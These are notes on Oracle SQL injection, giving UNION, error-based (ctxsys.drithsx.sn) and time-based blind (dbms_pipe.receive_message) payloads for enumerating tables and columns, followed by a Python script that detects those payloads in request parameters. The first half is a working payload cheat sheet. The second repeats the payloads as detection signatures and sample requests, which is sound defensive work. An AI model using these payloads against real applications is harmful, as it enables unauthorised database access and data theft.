1. UNION injection
Determine the number of columns
order by 4
Determine which column is echoed back (pad with null first)
union select 1,null from dual
Query table names
First table: union select null,(select table_name from user_tables where rownum=1) from dual
Second and later tables: union select null,(select table_name from(select rownum no,table_name from user_tables) where no=2) from dual
Query column names
First column: union select 1,(select column_name from user_tab_columns where table_name='test3' and rownum=1) from dual
Second and later columns: union select null,(select column_name from(select rownum no,column_name from user_tab_columns) where no=2) from dual
Query field values
union select null,(select "test33" from "test3") from dual
2. Oracle error-based injection
or 1=ctxsys.drithsx.sn(1,(select user from dual)) --
or 1=ctxsys.drithsx.sn(1,(select (select table_name from user_tables where rownum=1) from dual)) --
3. Blind injection
Some functions used for blind injection:
and 1= dbms_pipe.receive_message('xxx', 1)--
and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',2),0) from dual) --
Recommended: use sqlmap
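
Detection side of the three payload families above, as an added example that is not part of the original notes: a Python check that flags query parameters containing the Oracle-specific markers listed on this page (order by N, union select ... from dual, user_tables / user_tab_columns, ctxsys.drithsx.sn, dbms_pipe.receive_message). The signature names, function names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One signature per payload shape listed on this page (names are hypothetical).
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "union_select_dual": re.compile(
        r"\bunion\s+(?:all\s+)?select\b.*\bfrom\s+dual\b", re.I | re.S),
    "dictionary_view": re.compile(r"\buser_(?:tables|tab_columns)\b", re.I),
    "error_based_ctxsys": re.compile(
        r"\bctxsys\s*\.\s*drithsx\s*\.\s*sn\s*\(", re.I),
    "time_based_dbms_pipe": re.compile(
        r"\bdbms_pipe\s*\.\s*receive_message\s*\(", re.I),
}

def normalize(value):
    """Undo one extra layer of URL encoding and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(value))

def classify(value):
    """Return the sorted names of all signatures matching one parameter value."""
    text = normalize(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(requests):
    """Return (request, parameter, hits) for every query parameter that matches."""
    findings = []
    for req in requests:
        # parse_qsl already decodes the value once; normalize() decodes again.
        for param, value in parse_qsl(urlsplit(req).query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((req, param, hits))
    return findings

# Constructed sample requests (not real traffic).
SAMPLE_REQUESTS = [
    "/item?id=7",
    "/item?id=7+order+by+4",
    "/item?id=7+union+select+null,(select+table_name+from+user_tables"
    "+where+rownum=1)+from+dual",
    "/item?id=7+or+1=ctxsys.drithsx.sn(1,(select+user+from+dual))+--",
    "/item?id=7%2520and%25201=dbms_pipe.receive_message('xxx',1)--",
    "/search?q=order+by+phone+or+email",  # benign text, must not be flagged
]

if __name__ == "__main__":
    for req, param, hits in scan(SAMPLE_REQUESTS):
        print(f"{param}: {', '.join(hits)} <- {req}")
```

A hit on ctxsys.drithsx.sn or dbms_pipe.receive_message in user-supplied input is a strong signal, since ordinary application parameters have no reason to name those packages. The durable fix remains bind variables in the application's queries rather than pattern matching at the edge.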